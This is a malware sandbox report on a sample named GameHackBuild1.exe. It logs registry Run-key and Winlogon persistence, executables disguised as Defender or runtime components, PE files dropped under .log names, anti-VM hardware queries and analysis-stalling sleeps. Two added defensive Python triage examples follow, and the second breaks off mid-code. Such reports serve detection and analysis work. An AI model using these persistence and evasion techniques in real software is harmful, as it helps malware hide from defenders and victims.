Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run runtimesvc
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OfficeClickToRun
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SSblKNNQege
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe | Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run RuntimeBroker
                      Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

Source: Yara match	File source: Process Memory Space: MpDefenderCoreProtion.exe PID: 7932, type: MEMORYSTR
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, PNPDeviceID, Description, MediaType FROM Win32_DiskDrive (3 identical entries)
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Model, serialnumber FROM Win32_DiskDrive
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe	Memory allocated: 2790000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe	Memory allocated: 2900000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe	Memory allocated: 4900000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe	Memory allocated: 17D0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe	Memory allocated: 3120000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe	Memory allocated: 5120000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe	Memory allocated: 1570000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe	Memory allocated: 3180000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe	Memory allocated: 2F80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2BE0000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 2E80000 memory reserve | memory write watch
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Memory allocated: 4E80000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Memory allocated: 1630000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Memory allocated: 1B1A0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe	Memory allocated: 840000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe	Memory allocated: 1A5B0000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer (2 identical entries)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Window / User API: threadDelayed 1612
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe	Window / User API: threadDelayed 641
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\PxMOoBdB.log
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\BpJZMyRc.log
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\ErvIhhWY.log
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\syFrxmlp.log
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\wowiEjmi.log
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\QLuoYXmy.log
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\mOMkzqHG.log
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\jdhUscxN.log
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\brpMezGb.log
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Dropped PE file which has not been started: C:\Users\user\Desktop\WmQvmhxk.log
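The drops listed above are PE images written to the Desktop under *.log names, and csc.exe wrote a new msedge.exe over the one in C:\Program Files (x86)\Microsoft\Edge\Application. The following is an added Python example (not part of the Joe Sandbox report and not the sample's code) for triaging such drops by content rather than by name: it checks for an MZ header whose e_lfanew points at the PE signature, hashes each file, and reports any name that also appears in a known-good baseline with a different hash. The file names come from the report; their contents and the baseline hash are constructed stand-ins.

```python
"""Triage dropped files by content, not by extension.

Added example for this report, not Joe Sandbox code. File names are the
ones the report lists; their contents are constructed stand-ins, and the
baseline hash is a placeholder for a vendor's real known-good value.
"""
import hashlib
import os
import struct
import tempfile

PE_EXTENSIONS = {".exe", ".dll", ".sys", ".scr", ".ocx", ".cpl", ".drv"}


def looks_like_pe(data):
    """True if data starts with an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def triage(paths):
    """Hash each file and say whether its content is a PE hiding behind its extension."""
    findings = {}
    for path in paths:
        with open(path, "rb") as fh:
            data = fh.read()
        is_pe = looks_like_pe(data)
        ext = os.path.splitext(path)[1].lower()
        if is_pe and ext not in PE_EXTENSIONS:
            verdict = "pe_with_disguised_extension"
        elif is_pe:
            verdict = "pe"
        else:
            verdict = None
        findings[os.path.basename(path)] = {
            "sha256": hashlib.sha256(data).hexdigest(),
            "is_pe": is_pe,
            "verdict": verdict,
        }
    return findings


def baseline_mismatches(findings, baseline):
    """Names whose hash differs from the known-good baseline: an overwritten
    vendor binary such as msedge.exe shows up here."""
    return sorted(name for name, f in findings.items()
                  if name in baseline and f["sha256"] != baseline[name])


def make_minimal_pe(tag=b""):
    """Constructed 0x80-byte buffer carrying only MZ, e_lfanew and the PE
    signature: enough for the header check, not a loadable image."""
    buf = bytearray(0x80)
    buf[:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)
    buf[0x40:0x44] = b"PE\0\0"
    buf[0x60:0x60 + len(tag)] = tag
    return bytes(buf)


def demo():
    """Write three constructed files to a temp dir and triage them."""
    d = tempfile.mkdtemp()
    samples = {
        "PxMOoBdB.log": make_minimal_pe(b"dropped"),   # PE hiding as a .log
        "notes.log": b"just a text log\n",             # genuine text file
        "msedge.exe": make_minimal_pe(b"replaced"),    # stands in for the overwritten binary
    }
    paths = []
    for name, content in samples.items():
        p = os.path.join(d, name)
        with open(p, "wb") as fh:
            fh.write(content)
        paths.append(p)
    findings = triage(paths)
    # Placeholder for the genuine msedge.exe hash; any real value differs from ours.
    baseline = {"msedge.exe": "0" * 64}
    return findings, baseline_mismatches(findings, baseline)


if __name__ == "__main__":
    found, changed = demo()
    for name, f in found.items():
        print(f"{name:14} pe={f['is_pe']!s:5} verdict={f['verdict']}  {f['sha256'][:16]}")
    print("baseline mismatches:", changed)
```

The header check is deliberately shallow: it is meant to decide in a few microseconds whether a file needs a real PE parser and a detonation, not to validate the image. For the Program Files overwrite, the hash comparison against a baseline taken from a clean install (or the vendor's signed catalog) is what tells you the original binary is gone.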
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe TID: 7624	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe TID: 7980	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep count: 1612 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 7464	Thread sleep count: 294 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2120	Thread sleep count: 40 > 30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2120	Thread sleep time: -12000000s >= -30000s
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe TID: 7980	Thread sleep count: 163 > 30
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe TID: 7980	Thread sleep time: -163000s >= -30000s
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe TID: 7328	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe TID: 8212	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe TID: 6244	Thread sleep count: 641 > 30
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe TID: 3964	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Product, Manufacturer, SerialNumber, Version FROM Win32_BaseBoard
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed (3 identical entries)
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Code function: 0_2_00A0A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Code function: 0_2_00A1B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Code function: 0_2_00A2AAA8 FindFirstFileExA
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe	Code function: 8_2_00EDA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe	Code function: 8_2_00EEB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\GameHack.exe	Code function: 8_2_00EFAAA8 FindFirstFileExA
Source: C:\Users\user\Desktop\GameHackBuild1.exe.bin.exe	Code function: 0_2_00A1DD72 VirtualQuery,GetSystemInfo
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\MpDefenderProtector.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\Windows\Defender\MpDefenderCoreProtion.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 300000
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	Thread delayed: delay time: 922337203685477 (2 identical entries)
Source: C:\Users\user\AppData\Roaming\chainReviewdhcp\containerRuntime.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\runtimesvc.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: Solara.exe, 00000009.00000002.2515285033.0000000000401000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: goware/pkg/detection/Anti_VM.VMWareBIOS
Source: containerRuntime.exe, 0000001A.00000002.1902578971.000000001B725000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: Solara.exe, 00000009.00000002.2515285033.0000000000401000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: C:/Users/h3xcode/GolandProjects/AntiVM/pkg/detection/Anti_VM/VMWare.go
Source: containerRuntime.exe, 0000001A.00000002.1902638465.000000001B72B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: Solara.exe	Binary or memory string: teDivideScrollLShiftRShiftOEM102PacketNoNamebitmaphackerinjectdumperdeobfsvmware%*s%s activeclosedsocks5CANCELGOAWAYPADDEDBasic CookieacceptcookieexpectoriginserverExpectstatusPragmasocks Lockedexec: 390625rdtscppopcntuint16uint32uint64structchan<-<-chan Value
Source: GameHack.exe, 00000008.00000003.1295968770.0000000000C73000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yw{
Source: Solara.exe, 00000009.00000002.2515285033.0000000000401000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: goware/pkg/detection/Anti_VM.VMWareDisk
Source: containerRuntime.exe, 0000001A.00000002.1902578971.000000001B725000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Solara.exe, 00000009.00000002.2515285033.0000000000401000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: max=scav ptr ] = (usageinit ms, fault tab= top=[...], fp:MarchApril+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930monthLocalntohsCall Counttls: Earlyparsefilesimap2imap3imapspop3shostsutf-8%s*%dtext/bad nGreekAdlamBamumBatakBuhidDograKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSHA-1matchrune cpu%dP-224P-256P-384P-521ECDSA (at ClassStringFormat[]byte' for stringCancelReturnEscapeAcceptSelectInsertDeleteDivideScrollLShiftRShiftOEM102PacketNoNamebitmaphackerinjectdumperdeobfsvmware%*s%s
Source: wscript.exe, 00000006.00000002.1351138385.00000000009D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\.
Source: containerRuntime.exe, 0000001A.00000002.1902988796.000000001BA37000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
Source: containerRuntime.exe, 0000001A.00000002.1920943290.000000001BB96000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:&
Source: RegAsm.exe, 00000012.00000002.2537701192.0000000005AC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RA
Source: GameHack.exe, 00000008.00000002.1297051260.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Ven_NECVMWar&Prod_VMware_SATA_CD00#4&22,
Source: Solara.exe, 00000009.00000002.2509569119.0000000000112000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.2537701192.0000000005AC9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
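The evasion section above is a flat list of single observations: WMI queries for disk, BIOS and baseboard serials, thread delays of 922337203685477 (far beyond anything a sandbox will wait out), sleep loops past the report's own "> 30" threshold, write-watch allocations, and SetErrorMode calls. The following is an added Python example (not Joe Sandbox's own code) that turns such lines into a per-process evasion score so the signal is not drowned by the 49 identical SetErrorMode entries. The line grammar, the indicator names and the weights are this example's own assumptions; the sample lines are copied from this report, in both the fused form shown here and a tab-separated form.

```python
"""Score sandbox-evasion indicators in Joe Sandbox behaviour lines.

Added example for this report, not Joe Sandbox code. The line grammar,
the indicator names and the weights are this example's own assumptions.
"""
import re
from collections import defaultdict

# One "Source: <exe>[ TID: n] <event>" line per observation. The extracted
# report fuses the two columns ("Solara.exeWMI Queries: ..."); a tab-separated
# export works too, because the regex anchors on the event keyword.
EVENT_RE = re.compile(
    r"^Source:\s*(?P<src>.+?\.exe)(?:\s+TID:\s*(?P<tid>\d+))?\s*"
    r"(?P<event>(?:WMI Queries|Thread sleep time|Thread sleep count|"
    r"Thread delayed|Memory allocated|Process information set):.*)$"
)

# WMI classes whose serials / models give away a VM or a known sandbox image.
HW_CLASSES = ("win32_diskdrive", "win32_bios", "win32_baseboard",
              "win32_computersystem", "win32_videocontroller")

SLEEP_MAX = 0xFFFFFFFE   # largest finite Sleep(DWORD) argument; anything beyond it means "never wake up"
SLEEP_LOOP_MIN = 30      # the report's own "> 30" threshold for sleep loops

# SetErrorMode(SEM_NOOPENFILEERRORBOX) is set by the .NET runtime and plenty of
# benign software, so it is recorded but carries no weight.
WEIGHTS = {"hw_fingerprint": 3, "infinite_sleep": 3, "sleep_loop": 2,
           "write_watch": 1, "error_mode": 0}


def parse_line(line):
    """Return (process basename, event text), or None for lines not modelled."""
    m = EVENT_RE.match(line.strip())
    if not m:
        return None
    return m.group("src").rsplit("\\", 1)[-1], m.group("event")


def first_int(text):
    m = re.search(r"\d+", text)
    return int(m.group()) if m else None


def classify(event):
    """Map one event text to an indicator name, or None if it is not one."""
    kind, _, tail = event.partition(":")
    low = tail.lower()
    if kind == "WMI Queries":
        return "hw_fingerprint" if any(c in low for c in HW_CLASSES) else None
    if kind in ("Thread sleep time", "Thread delayed"):
        n = first_int(tail)   # magnitude only; the report prints negative relative waits
        return "infinite_sleep" if n is not None and n > SLEEP_MAX else None
    if kind == "Thread sleep count":
        n = first_int(tail)
        return "sleep_loop" if n is not None and n > SLEEP_LOOP_MIN else None
    if kind == "Memory allocated":
        return "write_watch" if "write watch" in low else None
    if kind == "Process information set":
        return "error_mode" if "noopenfileerrorbox" in low else None
    return None


def score_evasion(lines):
    """Per process: how often each indicator fired, plus a weighted score that
    counts each distinct indicator once (49 identical SetErrorMode lines are
    one behaviour, not forty-nine)."""
    per_proc = defaultdict(lambda: defaultdict(int))
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, event = parsed
        ind = classify(event)
        if ind is not None:
            per_proc[src][ind] += 1
    return {
        src: {"indicators": dict(inds), "score": sum(WEIGHTS[i] for i in inds)}
        for src, inds in per_proc.items()
    }


# Constructed sample: lines copied from this report (fused form), plus three in
# the tab-separated form. Not a complete behaviour export.
SAMPLE_LINES = [
    r"Source: C:\Users\user\AppData\Roaming\WinRuntimePerfMonitor\Solara.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT DeviceID, PNPDeviceID, Description, MediaType FROM Win32_DiskDrive",
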